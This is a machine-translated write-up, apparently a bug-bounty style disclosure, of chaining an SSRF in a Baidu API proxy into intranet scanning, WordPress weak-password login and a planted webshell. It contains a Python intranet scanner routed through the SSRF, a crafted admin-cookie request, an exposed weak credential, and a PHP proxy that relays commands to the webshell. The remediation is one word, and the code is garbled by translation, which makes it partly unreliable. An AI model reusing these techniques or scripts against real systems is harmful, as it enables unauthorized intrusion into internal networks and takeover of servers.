A Baidu WebShell from SSRF to Intranet

A Baidu WebShell from SSRF to Intranet

All stories start with a simple SSRF...

1. An SSRF

Http://apistore.baidu.com/astore/toolshttpproxy

 

Full functionality, including get post or something.



2. Intranet Detection

First, obtain some Intranet ip addresses from dns brute-force attacks, and then write a script for detection.



Test script

# Encoding = utf-8import httplibimport timeimport stringimport sysimport randomimport jsonimport tracebackimport urllib reload (sys) sys. setdefaultencoding ('utf8') headers = {'cooker': 'add your own ', 'content-type': 'application/x-www-form-urlencoded; charset = UTF-8 ', 'X-Requested-with': 'xmlhttprequest ', 'user-agent': 'mozilla/5.0 (Windows NT 6.1; WOW64; rv: 35.0) gecko/20100101 Firefox/35.0 '} for I in range (1,255): try: print I s = "172.22.1.% s "% (I) conn = httplib. HTTPConnection ('apistore .baidu.com ') conn. request (method = 'post', url = "/astore/toolshttpproxysend ", body = 'reqmethod = GET & reqUrl = http % 3A % 2F % 2F '+ s +' & token = token ', headers = headers) msg = conn. getresponse (). read () msg = json. loads (msg) if msg ["retMsg"] = "success": print s f = open('rrrr.txt ',' AB + ') f. write (s + '\ r \ n') f. write (urllib. unquote (msg ["retData"] ["responseHeader"]). replace ('<br/>', '\ r \ n') +' \ r \ n') f. write (urllib. unquote (msg ["retData"] ["responseBody"]). replace ('<br/>', '\ r \ n') +' \ r \ n \ r \ n') f. close () conn. close () failed T: print traceback. format_exc () pass

Test results:
 

 

One of the wordpress programs caught my attention.

Http: // 172.22.1.19 (cdm.baidu.com)



3. wordpress weak password detection


 

Weak passwords still result in many results

Wanglu admin

Take a test

Log on to POST first, and add it to the Request Header Based on the obtained cookie.



Http://apistore.baidu.com/astore/toolshttpproxysend?



ReqMethod = POST & reqUrl = http: // 172.22.1.19/wp-admin/& token = Response & reqHeaders [0] [key] = Cookie & reqHeaders [0] [value] = response = Response % 7C % 7C1425449844% 7C % 7C1425446244% 7C % 7C4bcc9f20e60d5905d3aaf9eda0c5fe28; bytes = 0; woocommerce_cart_hash = 0; wordpress_test_cookie = WP + Cookie + check; token = wanglu % 7C1425449844% signature; token = wanglu % signature;



The html after the background login is successfully queried.



The following is simple wordpress using shell and writing templates.



This process is troublesome, but it can be successful after a long time.



4. Connect to webshell

For ease of operation, a php forwarding proxy is written locally.
 

<?php $webshell="http://apistore.baidu.com/astore/toolshttpproxysend";$data['reqMethod']='POST';$data['reqUrl']='http://172.22.1.19/wp-content/themes/salient-new/404.php';$data['token']='ae6e554399dd045278f4128312f13853';$i = 0;foreach($_POST as $key => $value){ $data["reqBodyParams[$i][key]"]=$key; $data["reqBodyParams[$i][value]"]= urlencode( $value ); $i++;}$data = http_build_query($data);   $opts = array (   'http' => array (   'method' => 'POST',   'header'=> "Content-type: application/x-www-form-urlencoded\r\nCookie: cookie\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" .   "Content-Length: " . strlen($data) . "\r\n",   'content' => $data) );  $context = stream_context_create($opts);   $html = @file_get_contents($webshell, false, $context); $data = json_decode($html,true);echo urldecode($data["retData"]["responseBody"]);?>

The process is complete and the permission is obtained.
 

 

Solution:

Filter